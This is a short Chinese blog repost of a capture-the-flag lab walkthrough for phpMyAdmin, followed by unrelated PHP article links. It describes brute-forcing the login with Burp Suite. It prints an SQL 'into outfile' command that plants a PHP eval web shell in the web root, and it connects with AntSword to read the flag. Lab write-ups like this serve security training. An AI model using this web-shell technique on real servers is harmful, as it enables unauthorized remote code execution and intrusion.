墨者学院——phpMyAdmin后台文件包含分析溯源
2021/6/3 20:24:34
本文主要是介绍墨者学院——phpMyAdmin后台文件包含分析溯源,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
此题利用一句话***
进入登陆界面,用burpsuite爆破得到username与password都为:root
进入SQL界面,输入一句话***(密码为leo),点击“执行”:
select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php"
(/var/www/html/ 是网站的根目录)
此时打开蚁剑(注意:url后面记得跟上一句话***目标的页面3.php):
在根目录找到key.txt:
这篇关于墨者学院——phpMyAdmin后台文件包含分析溯源的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-09-28怎么把PHP程序打包?-icode9专业技术文章分享
- 2024-09-28怎么用Phar打包PHP程序?-icode9专业技术文章分享
- 2024-09-13手动在github上下载的mfpt包,怎么放到thinkphp5.0框架并正常使用-icode9专业技术文章分享
- 2024-09-05python的<class 'bytearray'>相当于php的哪个数据类型-icode9专业技术文章分享
- 2024-09-05php 导出银行卡号避免科学技术法的方法-icode9专业技术文章分享
- 2024-08-30什么样的php代码质量差被称为垃圾代码-icode9专业技术文章分享
- 2024-08-30用 PHP 调用拼多多的接口以获取订单状态消息的步骤方法和代码示例-icode9专业技术文章分享
- 2024-08-27phpunit单元测试框架的入门和使用方法介绍-icode9专业技术文章分享
- 2024-08-24PHP 中date("w") 周一是多少-icode9专业技术文章分享
- 2024-08-14thinkphp8.0获取域名或主机名方法-icode9专业技术文章分享